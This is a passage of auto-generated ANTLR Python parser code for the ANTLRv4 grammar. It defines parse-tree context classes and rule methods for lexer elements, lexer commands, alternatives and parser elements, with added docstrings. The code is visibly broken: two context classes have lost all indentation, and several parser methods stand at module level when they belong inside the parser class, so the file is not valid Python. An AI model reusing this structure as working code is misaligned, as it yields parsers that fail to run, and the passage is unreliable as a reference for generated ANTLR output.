                listener.enterLexerElements(self)

        def exitRule(self, listener:ParseTreeListener):
            if hasattr( listener, "exitLexerElements" ):
                listener.exitLexerElements(self)

        def accept(self, visitor:ParseTreeVisitor):
            if hasattr( visitor, "visitLexerElements" ):
                return visitor.visitLexerElements(self)
            else:
                return visitor.visitChildren(self)
    def lexerElements(self):
        """Parse the 'lexerElements' rule (auto-generated ANTLR code).

        Matches: lexerElement+ — one or more lexer elements, looping while
        the lookahead stays in the lexer-element start set.  Each element
        is accumulated into localctx.elements.  Returns the populated
        LexerElementsContext.
        """
        localctx = ANTLRv4Parser.LexerElementsContext(self, self._ctx, self.state)
        self.enterRule(localctx, 72, self.RULE_lexerElements)
        self._la = 0 # Token type
        try:
            self.enterOuterAlt(localctx, 1)
            self.state = 407
            self._errHandler.sync(self)
            _la = self._input.LA(1)
            # lexerElement+ : loop until lookahead leaves the start set (bit-set test).
            while True:
                self.state = 406
                localctx._lexerElement = self.lexerElement()
                localctx.elements.append(localctx._lexerElement)
                self.state = 409
                self._errHandler.sync(self)
                _la = self._input.LA(1)
                if not ((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << ANTLRv4Parser.TOKEN_REF) | (1 << ANTLRv4Parser.RULE_REF) | (1 << ANTLRv4Parser.LEXER_CHAR_SET) | (1 << ANTLRv4Parser.DOC_COMMENT) | (1 << ANTLRv4Parser.STRING_LITERAL) | (1 << ANTLRv4Parser.BEGIN_ACTION) | (1 << ANTLRv4Parser.LPAREN) | (1 << ANTLRv4Parser.DOT) | (1 << ANTLRv4Parser.NOT))) != 0)):
                    break

        except RecognitionException as re:
            localctx.exception = re
            self._errHandler.reportError(self, re)
            self._errHandler.recover(self, re)
        finally:
            self.exitRule()
        return localctx
class LexerElementContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def getRuleIndex(self):
return ANTLRv4Parser.RULE_lexerElement
def copyFrom(self, ctx:ParserRuleContext):
super().copyFrom(ctx)
class LexerElementLabeledContext(LexerElementContext):
def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.LexerElementContext
super().__init__(parser)
self.value = None # LabeledLexerElementContext
self.suffix = None # EbnfSuffixContext
self.copyFrom(ctx)
def labeledLexerElement(self):
return self.getTypedRuleContext(ANTLRv4Parser.LabeledLexerElementContext,0)
def ebnfSuffix(self):
return self.getTypedRuleContext(ANTLRv4Parser.EbnfSuffixContext,0)
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterLexerElementLabeled" ):
listener.enterLexerElementLabeled(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitLexerElementLabeled" ):
listener.exitLexerElementLabeled(self)
def accept(self, visitor:ParseTreeVisitor):
if hasattr( visitor, "visitLexerElementLabeled" ):
return visitor.visitLexerElementLabeled(self)
else:
return visitor.visitChildren(self)
class LexerElementBlockContext(LexerElementContext):
    """`lexerElement` alternative: parenthesized lexer block, optional EBNF suffix."""

    def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.LexerElementContext
        super().__init__(parser)
        self.value = None # LexerBlockContext
        self.suffix = None # EbnfSuffixContext
        self.copyFrom(ctx)

    def lexerBlock(self):
        return self.getTypedRuleContext(ANTLRv4Parser.LexerBlockContext,0)

    def ebnfSuffix(self):
        return self.getTypedRuleContext(ANTLRv4Parser.EbnfSuffixContext,0)

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterLexerElementBlock" ):
            listener.enterLexerElementBlock(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitLexerElementBlock" ):
            listener.exitLexerElementBlock(self)

    def accept(self, visitor:ParseTreeVisitor):
        if hasattr( visitor, "visitLexerElementBlock" ):
            return visitor.visitLexerElementBlock(self)
        else:
            return visitor.visitChildren(self)
class LexerElementActionContext(LexerElementContext):
    """`lexerElement` alternative: action block, optional `?` (semantic predicate marker)."""

    def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.LexerElementContext
        super().__init__(parser)
        self.copyFrom(ctx)

    def actionBlock(self):
        return self.getTypedRuleContext(ANTLRv4Parser.ActionBlockContext,0)

    def QUESTION(self):
        return self.getToken(ANTLRv4Parser.QUESTION, 0)

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterLexerElementAction" ):
            listener.enterLexerElementAction(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitLexerElementAction" ):
            listener.exitLexerElementAction(self)

    def accept(self, visitor:ParseTreeVisitor):
        if hasattr( visitor, "visitLexerElementAction" ):
            return visitor.visitLexerElementAction(self)
        else:
            return visitor.visitChildren(self)
class LexerElementAtomContext(LexerElementContext):
    """`lexerElement` alternative: single lexer atom, optional EBNF suffix."""

    def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.LexerElementContext
        super().__init__(parser)
        self.value = None # LexerAtomContext
        self.suffix = None # EbnfSuffixContext
        self.copyFrom(ctx)

    def lexerAtom(self):
        return self.getTypedRuleContext(ANTLRv4Parser.LexerAtomContext,0)

    def ebnfSuffix(self):
        return self.getTypedRuleContext(ANTLRv4Parser.EbnfSuffixContext,0)

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterLexerElementAtom" ):
            listener.enterLexerElementAtom(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitLexerElementAtom" ):
            listener.exitLexerElementAtom(self)

    def accept(self, visitor:ParseTreeVisitor):
        if hasattr( visitor, "visitLexerElementAtom" ):
            return visitor.visitLexerElementAtom(self)
        else:
            return visitor.visitChildren(self)
def lexerElement(self):
    """Parse the `lexerElement` rule (rule index 74).

    Selects one of four alternatives via adaptive prediction (decision 45):
    labeled element, atom, or block — each with an optional EBNF suffix
    (`?`, `*`, `+`) — or an action block with an optional trailing `?`.
    Note the generated `self.state = N` assignments are ATN bookkeeping
    (presumably matching the serialized ATN; do not reorder).
    """
    localctx = ANTLRv4Parser.LexerElementContext(self, self._ctx, self.state)
    self.enterRule(localctx, 74, self.RULE_lexerElement)
    self._la = 0 # Token type
    try:
        self.state = 427
        self._errHandler.sync(self)
        la_ = self._interp.adaptivePredict(self._input,45,self._ctx)
        if la_ == 1:
            # Alt 1: labeledLexerElement ebnfSuffix?
            localctx = ANTLRv4Parser.LexerElementLabeledContext(self, localctx)
            self.enterOuterAlt(localctx, 1)
            self.state = 411
            localctx.value = self.labeledLexerElement()
            self.state = 413
            self._errHandler.sync(self)
            _la = self._input.LA(1)
            # Optional suffix: QUESTION, STAR or PLUS.
            if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << ANTLRv4Parser.QUESTION) | (1 << ANTLRv4Parser.STAR) | (1 << ANTLRv4Parser.PLUS))) != 0):
                self.state = 412
                localctx.suffix = self.ebnfSuffix()
            pass

        elif la_ == 2:
            # Alt 2: lexerAtom ebnfSuffix?
            localctx = ANTLRv4Parser.LexerElementAtomContext(self, localctx)
            self.enterOuterAlt(localctx, 2)
            self.state = 415
            localctx.value = self.lexerAtom()
            self.state = 417
            self._errHandler.sync(self)
            _la = self._input.LA(1)
            if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << ANTLRv4Parser.QUESTION) | (1 << ANTLRv4Parser.STAR) | (1 << ANTLRv4Parser.PLUS))) != 0):
                self.state = 416
                localctx.suffix = self.ebnfSuffix()
            pass

        elif la_ == 3:
            # Alt 3: lexerBlock ebnfSuffix?
            localctx = ANTLRv4Parser.LexerElementBlockContext(self, localctx)
            self.enterOuterAlt(localctx, 3)
            self.state = 419
            localctx.value = self.lexerBlock()
            self.state = 421
            self._errHandler.sync(self)
            _la = self._input.LA(1)
            if (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << ANTLRv4Parser.QUESTION) | (1 << ANTLRv4Parser.STAR) | (1 << ANTLRv4Parser.PLUS))) != 0):
                self.state = 420
                localctx.suffix = self.ebnfSuffix()
            pass

        elif la_ == 4:
            # Alt 4: actionBlock QUESTION?
            localctx = ANTLRv4Parser.LexerElementActionContext(self, localctx)
            self.enterOuterAlt(localctx, 4)
            self.state = 423
            self.actionBlock()
            self.state = 425
            self._errHandler.sync(self)
            _la = self._input.LA(1)
            if _la==ANTLRv4Parser.QUESTION:
                self.state = 424
                self.match(ANTLRv4Parser.QUESTION)
            pass

    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class LabeledLexerElementContext(ParserRuleContext):
    """Parse-tree context for `labeledLexerElement`: identifier (= | +=) (lexerAtom | lexerBlock)."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def identifier(self):
        return self.getTypedRuleContext(ANTLRv4Parser.IdentifierContext,0)

    def ASSIGN(self):
        return self.getToken(ANTLRv4Parser.ASSIGN, 0)

    def PLUS_ASSIGN(self):
        return self.getToken(ANTLRv4Parser.PLUS_ASSIGN, 0)

    def lexerAtom(self):
        return self.getTypedRuleContext(ANTLRv4Parser.LexerAtomContext,0)

    def lexerBlock(self):
        return self.getTypedRuleContext(ANTLRv4Parser.LexerBlockContext,0)

    def getRuleIndex(self):
        return ANTLRv4Parser.RULE_labeledLexerElement

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterLabeledLexerElement" ):
            listener.enterLabeledLexerElement(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitLabeledLexerElement" ):
            listener.exitLabeledLexerElement(self)

    def accept(self, visitor:ParseTreeVisitor):
        if hasattr( visitor, "visitLabeledLexerElement" ):
            return visitor.visitLabeledLexerElement(self)
        else:
            return visitor.visitChildren(self)
def labeledLexerElement(self):
    """Parse `labeledLexerElement` (rule index 76).

    Shape: identifier (ASSIGN | PLUS_ASSIGN) (lexerAtom | lexerBlock).
    Raises NoViableAltException when the token after the operator starts
    neither a lexer atom nor a block.
    """
    localctx = ANTLRv4Parser.LabeledLexerElementContext(self, self._ctx, self.state)
    self.enterRule(localctx, 76, self.RULE_labeledLexerElement)
    self._la = 0 # Token type
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 429
        self.identifier()
        self.state = 430
        _la = self._input.LA(1)
        # The label operator must be `=` or `+=`; otherwise attempt inline recovery.
        if not(_la==ANTLRv4Parser.ASSIGN or _la==ANTLRv4Parser.PLUS_ASSIGN):
            self._errHandler.recoverInline(self)
        else:
            self._errHandler.reportMatch(self)
            self.consume()
        self.state = 433
        self._errHandler.sync(self)
        token = self._input.LA(1)
        if token in [ANTLRv4Parser.TOKEN_REF, ANTLRv4Parser.LEXER_CHAR_SET, ANTLRv4Parser.DOC_COMMENT, ANTLRv4Parser.STRING_LITERAL, ANTLRv4Parser.DOT, ANTLRv4Parser.NOT]:
            self.state = 431
            self.lexerAtom()
            pass
        elif token in [ANTLRv4Parser.LPAREN]:
            self.state = 432
            self.lexerBlock()
            pass
        else:
            raise NoViableAltException(self)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class LexerBlockContext(ParserRuleContext):
    """Parse-tree context for `lexerBlock`: LPAREN lexerAltList RPAREN."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def LPAREN(self):
        return self.getToken(ANTLRv4Parser.LPAREN, 0)

    def lexerAltList(self):
        return self.getTypedRuleContext(ANTLRv4Parser.LexerAltListContext,0)

    def RPAREN(self):
        return self.getToken(ANTLRv4Parser.RPAREN, 0)

    def getRuleIndex(self):
        return ANTLRv4Parser.RULE_lexerBlock

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterLexerBlock" ):
            listener.enterLexerBlock(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitLexerBlock" ):
            listener.exitLexerBlock(self)

    def accept(self, visitor:ParseTreeVisitor):
        if hasattr( visitor, "visitLexerBlock" ):
            return visitor.visitLexerBlock(self)
        else:
            return visitor.visitChildren(self)
def lexerBlock(self):
    """Parse `lexerBlock` (rule index 78): '(' lexerAltList ')'."""
    localctx = ANTLRv4Parser.LexerBlockContext(self, self._ctx, self.state)
    self.enterRule(localctx, 78, self.RULE_lexerBlock)
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 435
        self.match(ANTLRv4Parser.LPAREN)
        self.state = 436
        self.lexerAltList()
        self.state = 437
        self.match(ANTLRv4Parser.RPAREN)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class LexerCommandsContext(ParserRuleContext):
    """Parse-tree context for `lexerCommands`: RARROW lexerCommand (COMMA lexerCommand)*."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def RARROW(self):
        return self.getToken(ANTLRv4Parser.RARROW, 0)

    def lexerCommand(self, i:int=None):
        # With i=None return all command children; otherwise the i-th one.
        if i is None:
            return self.getTypedRuleContexts(ANTLRv4Parser.LexerCommandContext)
        else:
            return self.getTypedRuleContext(ANTLRv4Parser.LexerCommandContext,i)

    def COMMA(self, i:int=None):
        if i is None:
            return self.getTokens(ANTLRv4Parser.COMMA)
        else:
            return self.getToken(ANTLRv4Parser.COMMA, i)

    def getRuleIndex(self):
        return ANTLRv4Parser.RULE_lexerCommands

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterLexerCommands" ):
            listener.enterLexerCommands(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitLexerCommands" ):
            listener.exitLexerCommands(self)

    def accept(self, visitor:ParseTreeVisitor):
        if hasattr( visitor, "visitLexerCommands" ):
            return visitor.visitLexerCommands(self)
        else:
            return visitor.visitChildren(self)
def lexerCommands(self):
    """Parse `lexerCommands` (rule index 80): '->' lexerCommand (',' lexerCommand)*."""
    localctx = ANTLRv4Parser.LexerCommandsContext(self, self._ctx, self.state)
    self.enterRule(localctx, 80, self.RULE_lexerCommands)
    self._la = 0 # Token type
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 439
        self.match(ANTLRv4Parser.RARROW)
        self.state = 440
        self.lexerCommand()
        self.state = 445
        self._errHandler.sync(self)
        _la = self._input.LA(1)
        # Zero-or-more additional comma-separated commands.
        while _la==ANTLRv4Parser.COMMA:
            self.state = 441
            self.match(ANTLRv4Parser.COMMA)
            self.state = 442
            self.lexerCommand()
            self.state = 447
            self._errHandler.sync(self)
            _la = self._input.LA(1)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class LexerCommandContext(ParserRuleContext):
    """Parse-tree context for `lexerCommand`: name with optional parenthesized argument."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def lexerCommandName(self):
        return self.getTypedRuleContext(ANTLRv4Parser.LexerCommandNameContext,0)

    def LPAREN(self):
        return self.getToken(ANTLRv4Parser.LPAREN, 0)

    def lexerCommandExpr(self):
        return self.getTypedRuleContext(ANTLRv4Parser.LexerCommandExprContext,0)

    def RPAREN(self):
        return self.getToken(ANTLRv4Parser.RPAREN, 0)

    def getRuleIndex(self):
        return ANTLRv4Parser.RULE_lexerCommand

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterLexerCommand" ):
            listener.enterLexerCommand(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitLexerCommand" ):
            listener.exitLexerCommand(self)

    def accept(self, visitor:ParseTreeVisitor):
        if hasattr( visitor, "visitLexerCommand" ):
            return visitor.visitLexerCommand(self)
        else:
            return visitor.visitChildren(self)
def lexerCommand(self):
    """Parse `lexerCommand` (rule index 82).

    Decision 48 chooses between `name(expr)` (alt 1) and bare `name` (alt 2).
    """
    localctx = ANTLRv4Parser.LexerCommandContext(self, self._ctx, self.state)
    self.enterRule(localctx, 82, self.RULE_lexerCommand)
    try:
        self.state = 454
        self._errHandler.sync(self)
        la_ = self._interp.adaptivePredict(self._input,48,self._ctx)
        if la_ == 1:
            # Alt 1: lexerCommandName '(' lexerCommandExpr ')'
            self.enterOuterAlt(localctx, 1)
            self.state = 448
            self.lexerCommandName()
            self.state = 449
            self.match(ANTLRv4Parser.LPAREN)
            self.state = 450
            self.lexerCommandExpr()
            self.state = 451
            self.match(ANTLRv4Parser.RPAREN)
            pass

        elif la_ == 2:
            # Alt 2: lexerCommandName alone
            self.enterOuterAlt(localctx, 2)
            self.state = 453
            self.lexerCommandName()
            pass

    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class LexerCommandNameContext(ParserRuleContext):
    """Parse-tree context for `lexerCommandName`: identifier | MODE keyword."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def identifier(self):
        return self.getTypedRuleContext(ANTLRv4Parser.IdentifierContext,0)

    def MODE(self):
        return self.getToken(ANTLRv4Parser.MODE, 0)

    def getRuleIndex(self):
        return ANTLRv4Parser.RULE_lexerCommandName

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterLexerCommandName" ):
            listener.enterLexerCommandName(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitLexerCommandName" ):
            listener.exitLexerCommandName(self)

    def accept(self, visitor:ParseTreeVisitor):
        if hasattr( visitor, "visitLexerCommandName" ):
            return visitor.visitLexerCommandName(self)
        else:
            return visitor.visitChildren(self)
def lexerCommandName(self):
    """Parse `lexerCommandName` (rule index 84): identifier or the MODE keyword."""
    localctx = ANTLRv4Parser.LexerCommandNameContext(self, self._ctx, self.state)
    self.enterRule(localctx, 84, self.RULE_lexerCommandName)
    try:
        self.state = 458
        self._errHandler.sync(self)
        token = self._input.LA(1)
        if token in [ANTLRv4Parser.TOKEN_REF, ANTLRv4Parser.RULE_REF]:
            self.enterOuterAlt(localctx, 1)
            self.state = 456
            self.identifier()
            pass
        elif token in [ANTLRv4Parser.MODE]:
            self.enterOuterAlt(localctx, 2)
            self.state = 457
            self.match(ANTLRv4Parser.MODE)
            pass
        else:
            raise NoViableAltException(self)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class LexerCommandExprContext(ParserRuleContext):
    """Parse-tree context for `lexerCommandExpr`: identifier | INT."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def identifier(self):
        return self.getTypedRuleContext(ANTLRv4Parser.IdentifierContext,0)

    def INT(self):
        return self.getToken(ANTLRv4Parser.INT, 0)

    def getRuleIndex(self):
        return ANTLRv4Parser.RULE_lexerCommandExpr

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterLexerCommandExpr" ):
            listener.enterLexerCommandExpr(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitLexerCommandExpr" ):
            listener.exitLexerCommandExpr(self)

    def accept(self, visitor:ParseTreeVisitor):
        if hasattr( visitor, "visitLexerCommandExpr" ):
            return visitor.visitLexerCommandExpr(self)
        else:
            return visitor.visitChildren(self)
def lexerCommandExpr(self):
    """Parse `lexerCommandExpr` (rule index 86): an identifier or an integer literal."""
    localctx = ANTLRv4Parser.LexerCommandExprContext(self, self._ctx, self.state)
    self.enterRule(localctx, 86, self.RULE_lexerCommandExpr)
    try:
        self.state = 462
        self._errHandler.sync(self)
        token = self._input.LA(1)
        if token in [ANTLRv4Parser.TOKEN_REF, ANTLRv4Parser.RULE_REF]:
            self.enterOuterAlt(localctx, 1)
            self.state = 460
            self.identifier()
            pass
        elif token in [ANTLRv4Parser.INT]:
            self.enterOuterAlt(localctx, 2)
            self.state = 461
            self.match(ANTLRv4Parser.INT)
            pass
        else:
            raise NoViableAltException(self)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class AltListContext(ParserRuleContext):
    """Parse-tree context for `altList`: alternative ('|' alternative)*.

    Collected alternatives are accumulated in `self.alts`.
    """

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser
        self._alternative = None # AlternativeContext
        self.alts = list() # of AlternativeContexts

    def alternative(self, i:int=None):
        if i is None:
            return self.getTypedRuleContexts(ANTLRv4Parser.AlternativeContext)
        else:
            return self.getTypedRuleContext(ANTLRv4Parser.AlternativeContext,i)

    def OR(self, i:int=None):
        if i is None:
            return self.getTokens(ANTLRv4Parser.OR)
        else:
            return self.getToken(ANTLRv4Parser.OR, i)

    def getRuleIndex(self):
        return ANTLRv4Parser.RULE_altList

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterAltList" ):
            listener.enterAltList(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitAltList" ):
            listener.exitAltList(self)

    def accept(self, visitor:ParseTreeVisitor):
        if hasattr( visitor, "visitAltList" ):
            return visitor.visitAltList(self)
        else:
            return visitor.visitChildren(self)
def altList(self):
    """Parse `altList` (rule index 88): alternative ('|' alternative)*.

    Each parsed alternative is appended to `localctx.alts`.
    """
    localctx = ANTLRv4Parser.AltListContext(self, self._ctx, self.state)
    self.enterRule(localctx, 88, self.RULE_altList)
    self._la = 0 # Token type
    try:
        self.enterOuterAlt(localctx, 1)
        self.state = 464
        localctx._alternative = self.alternative()
        localctx.alts.append(localctx._alternative)
        self.state = 469
        self._errHandler.sync(self)
        _la = self._input.LA(1)
        # Zero-or-more '|'-separated alternatives.
        while _la==ANTLRv4Parser.OR:
            self.state = 465
            self.match(ANTLRv4Parser.OR)
            self.state = 466
            localctx._alternative = self.alternative()
            localctx.alts.append(localctx._alternative)
            self.state = 471
            self._errHandler.sync(self)
            _la = self._input.LA(1)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class AlternativeContext(ParserRuleContext):
    """Parse-tree context for `alternative`: elementOptions? element+ | (empty).

    Parsed elements are accumulated in `self.elements`.
    """

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser
        self._element = None # ElementContext
        self.elements = list() # of ElementContexts

    def elementOptions(self):
        return self.getTypedRuleContext(ANTLRv4Parser.ElementOptionsContext,0)

    def element(self, i:int=None):
        if i is None:
            return self.getTypedRuleContexts(ANTLRv4Parser.ElementContext)
        else:
            return self.getTypedRuleContext(ANTLRv4Parser.ElementContext,i)

    def getRuleIndex(self):
        return ANTLRv4Parser.RULE_alternative

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterAlternative" ):
            listener.enterAlternative(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitAlternative" ):
            listener.exitAlternative(self)

    def accept(self, visitor:ParseTreeVisitor):
        if hasattr( visitor, "visitAlternative" ):
            return visitor.visitAlternative(self)
        else:
            return visitor.visitChildren(self)
def alternative(self):
    """Parse `alternative` (rule index 90).

    Alt 1: optional elementOptions followed by one-or-more elements.
    Alt 2: the empty alternative (next token is SEMI/RPAREN/OR/POUND).
    """
    localctx = ANTLRv4Parser.AlternativeContext(self, self._ctx, self.state)
    self.enterRule(localctx, 90, self.RULE_alternative)
    self._la = 0 # Token type
    try:
        self.state = 481
        self._errHandler.sync(self)
        token = self._input.LA(1)
        if token in [ANTLRv4Parser.TOKEN_REF, ANTLRv4Parser.RULE_REF, ANTLRv4Parser.DOC_COMMENT, ANTLRv4Parser.STRING_LITERAL, ANTLRv4Parser.BEGIN_ACTION, ANTLRv4Parser.LPAREN, ANTLRv4Parser.LT, ANTLRv4Parser.DOT, ANTLRv4Parser.NOT]:
            self.enterOuterAlt(localctx, 1)
            self.state = 473
            self._errHandler.sync(self)
            _la = self._input.LA(1)
            # Optional element options introduced by '<'.
            if _la==ANTLRv4Parser.LT:
                self.state = 472
                self.elementOptions()

            self.state = 476
            self._errHandler.sync(self)
            _la = self._input.LA(1)
            # One-or-more elements (do-while over the element start set).
            while True:
                self.state = 475
                localctx._element = self.element()
                localctx.elements.append(localctx._element)
                self.state = 478
                self._errHandler.sync(self)
                _la = self._input.LA(1)
                if not ((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << ANTLRv4Parser.TOKEN_REF) | (1 << ANTLRv4Parser.RULE_REF) | (1 << ANTLRv4Parser.DOC_COMMENT) | (1 << ANTLRv4Parser.STRING_LITERAL) | (1 << ANTLRv4Parser.BEGIN_ACTION) | (1 << ANTLRv4Parser.LPAREN) | (1 << ANTLRv4Parser.DOT) | (1 << ANTLRv4Parser.NOT))) != 0)):
                    break
            pass
        elif token in [ANTLRv4Parser.SEMI, ANTLRv4Parser.RPAREN, ANTLRv4Parser.OR, ANTLRv4Parser.POUND]:
            # Empty alternative: consume nothing.
            self.enterOuterAlt(localctx, 2)
            pass
        else:
            raise NoViableAltException(self)
    except RecognitionException as re:
        localctx.exception = re
        self._errHandler.reportError(self, re)
        self._errHandler.recover(self, re)
    finally:
        self.exitRule()
    return localctx
class ElementContext(ParserRuleContext):
    """Generic parse-tree context for the `element` rule.

    Concrete labeled alternatives (ParserElementLabeled/Block/Atom/Action
    and ParserInlineDoc) subclass this and adopt children via copyFrom().
    """

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def getRuleIndex(self):
        return ANTLRv4Parser.RULE_element

    def copyFrom(self, ctx:ParserRuleContext):
        super().copyFrom(ctx)
class ParserElementLabeledContext(ElementContext):
    """`element` alternative: labeled element, optional EBNF suffix."""

    def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.ElementContext
        super().__init__(parser)
        self.value = None # LabeledElementContext
        self.suffix = None # EbnfSuffixContext
        self.copyFrom(ctx)

    def labeledElement(self):
        return self.getTypedRuleContext(ANTLRv4Parser.LabeledElementContext,0)

    def ebnfSuffix(self):
        return self.getTypedRuleContext(ANTLRv4Parser.EbnfSuffixContext,0)

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterParserElementLabeled" ):
            listener.enterParserElementLabeled(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitParserElementLabeled" ):
            listener.exitParserElementLabeled(self)

    def accept(self, visitor:ParseTreeVisitor):
        if hasattr( visitor, "visitParserElementLabeled" ):
            return visitor.visitParserElementLabeled(self)
        else:
            return visitor.visitChildren(self)
class ParserElementBlockContext(ElementContext):
    """`element` alternative: parenthesized block, optional EBNF suffix."""

    def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.ElementContext
        super().__init__(parser)
        self.value = None # BlockContext
        self.suffix = None # EbnfSuffixContext
        self.copyFrom(ctx)

    def block(self):
        return self.getTypedRuleContext(ANTLRv4Parser.BlockContext,0)

    def ebnfSuffix(self):
        return self.getTypedRuleContext(ANTLRv4Parser.EbnfSuffixContext,0)

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterParserElementBlock" ):
            listener.enterParserElementBlock(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitParserElementBlock" ):
            listener.exitParserElementBlock(self)

    def accept(self, visitor:ParseTreeVisitor):
        if hasattr( visitor, "visitParserElementBlock" ):
            return visitor.visitParserElementBlock(self)
        else:
            return visitor.visitChildren(self)
class ParserElementAtomContext(ElementContext):
    """`element` alternative: single atom, optional EBNF suffix."""

    def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.ElementContext
        super().__init__(parser)
        self.value = None # AtomContext
        self.suffix = None # EbnfSuffixContext
        self.copyFrom(ctx)

    def atom(self):
        return self.getTypedRuleContext(ANTLRv4Parser.AtomContext,0)

    def ebnfSuffix(self):
        return self.getTypedRuleContext(ANTLRv4Parser.EbnfSuffixContext,0)

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterParserElementAtom" ):
            listener.enterParserElementAtom(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitParserElementAtom" ):
            listener.exitParserElementAtom(self)

    def accept(self, visitor:ParseTreeVisitor):
        if hasattr( visitor, "visitParserElementAtom" ):
            return visitor.visitParserElementAtom(self)
        else:
            return visitor.visitChildren(self)
class ParserInlineDocContext(ElementContext):
    """`element` alternative: an inline DOC_COMMENT token captured as `value`."""

    def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.ElementContext
        super().__init__(parser)
        self.value = None # Token
        self.copyFrom(ctx)

    def DOC_COMMENT(self):
        return self.getToken(ANTLRv4Parser.DOC_COMMENT, 0)

    def enterRule(self, listener:ParseTreeListener):
        if hasattr( listener, "enterParserInlineDoc" ):
            listener.enterParserInlineDoc(self)

    def exitRule(self, listener:ParseTreeListener):
        if hasattr( listener, "exitParserInlineDoc" ):
            listener.exitParserInlineDoc(self)

    def accept(self, visitor:ParseTreeVisitor):
        if hasattr( visitor, "visitParserInlineDoc" ):
            return visitor.visitParserInlineDoc(self)
        else:
            return visitor.visitChildren(self)
class ParserElementActionContext(ElementContext):
    """`element` alternative: action block with an optional trailing `?`."""

    def __init__(self, parser, ctx:ParserRuleContext): # actually a ANTLRv4Parser.ElementContext
        super().__init__(parser)
